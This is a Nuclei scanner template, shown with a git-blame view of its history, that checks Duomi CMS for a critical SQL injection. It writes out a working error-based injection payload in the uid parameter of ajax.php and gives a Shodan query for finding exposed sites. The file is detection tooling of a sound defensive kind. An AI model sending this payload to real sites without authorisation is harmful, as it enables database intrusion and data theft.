nuclei-templates/http/vulnerabilities/other/duomicms-sql-injection.yaml

id: duomicms-sql-injection

info:
  name: Duomi CMS - SQL Injection
  author: pikpikcu
  severity: critical
  description: Duomi CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://redn3ck.github.io/2016/11/01/duomiCMS/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"DuomiCMS"
  tags: duomicms,sqli
variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200

# digest: 4a0a004730450220112a5ca288424ba70d536e63d8554436806074bd2fa35687177e0c25746c46b8022100f0014606898d12c5f5a7223bc521af8f75e6a398ef53788af0bc4c7eba211633:922c64590222798bb761d5b6d8e72950
Create duomicms-sql-injection.yaml 2021-02-26 15:44:31 +00:00			`id: duomicms-sql-injection`

			`info:`
Dashboard Content Enhancements (#5497) Dashboard Content Enhancements 2022-09-29 13:38:41 +00:00			`name: Duomi CMS - SQL Injection`
Create duomicms-sql-injection.yaml 2021-02-26 15:44:31 +00:00			`author: pikpikcu`
Dashboard Content Enhancements (#5497) Dashboard Content Enhancements 2022-09-29 13:38:41 +00:00			`severity: critical`
			`description: Duomi CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://redn3ck.github.io/2016/11/01/duomiCMS/`
Dashboard Content Enhancements (#5497) Dashboard Content Enhancements 2022-09-29 13:38:41 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
templateman update 2023-10-14 11:27:55 +00:00			`cvss-score: 10`
Dashboard Content Enhancements (#5497) Dashboard Content Enhancements 2022-09-29 13:38:41 +00:00			`cwe-id: CWE-89`
Update duomicms-sql-injection.yaml 2022-06-28 12:59:31 +00:00			`metadata:`
lint fixes 2022-06-28 13:50:23 +00:00			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
lint fixes 2022-06-28 13:50:23 +00:00			`shodan-query: title:"DuomiCMS"`
Create duomicms-sql-injection.yaml 2021-02-26 15:44:31 +00:00			`tags: duomicms,sqli`
Update duomicms-sql-injection.yaml 2022-06-30 02:48:22 +00:00			`variables:`
			`num: "999999999"`
Create duomicms-sql-injection.yaml 2021-02-26 15:44:31 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create duomicms-sql-injection.yaml 2021-02-26 15:44:31 +00:00			`- method: GET`
			`path:`
Update duomicms-sql-injection.yaml 2022-06-30 02:48:22 +00:00			`- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"`
Create duomicms-sql-injection.yaml 2021-02-26 15:44:31 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
Update duomicms-sql-injection.yaml 2022-06-30 02:48:22 +00:00			`- '{{md5({{num}})}}'`
Create duomicms-sql-injection.yaml 2021-02-26 15:44:31 +00:00
			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a004730450220112a5ca288424ba70d536e63d8554436806074bd2fa35687177e0c25746c46b8022100f0014606898d12c5f5a7223bc521af8f75e6a398ef53788af0bc4c7eba211633:922c64590222798bb761d5b6d8e72950`